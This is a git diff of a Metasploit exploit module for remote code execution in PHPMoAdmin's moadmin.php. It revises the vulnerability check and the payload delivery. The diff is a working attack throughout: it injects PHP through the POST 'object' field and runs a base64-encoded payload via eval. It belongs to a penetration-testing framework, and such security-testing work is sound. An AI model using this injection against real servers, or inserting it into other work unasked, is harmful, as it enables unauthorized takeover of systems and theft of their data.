diff --git a/modules/exploits/multi/http/phpmoadmin_exec.rb b/modules/exploits/multi/http/phpmoadmin_exec.rb index f6eef95194..b6d2c07f40 100644 --- a/modules/exploits/multi/http/phpmoadmin_exec.rb +++ b/modules/exploits/multi/http/phpmoadmin_exec.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Privileged' => false, 'Platform' => 'php', - 'Arch' => ARCH_PHP, + 'Arch' => ARCH_PHP, 'Targets' => [ [ 'PHPMoAdmin', { } ], @@ -44,16 +44,17 @@ class Metasploit3 < Msf::Exploit::Remote end def check + testrun = Rex::Text::rand_text_alpha(10) res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.to_s,'moadmin.php'), + 'uri' => normalize_uri(target_uri,'moadmin.php'), 'method' => 'POST', 'vars_post' => { - 'object' => '1;phpinfo();exit', + 'object' => "1;echo '#{testrun}';exit", } }) - if res and res.body.match(/Build Date/) + if res and res.body.include?(testrun) return Exploit::CheckCode::Vulnerable end @@ -65,14 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Executing payload...") res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.to_s,'moadmin.php'), + 'uri' => normalize_uri(target_uri,'moadmin.php'), 'method' => 'POST', 'vars_post' => { - 'object' => "1;eval(base64_decode($_SERVER[HTTP_CMD]));exit" - }, - 'headers' => { - 'Cmd' => Rex::Text.encode_base64(payload.encoded) + 'object' => "1;eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));exit" } })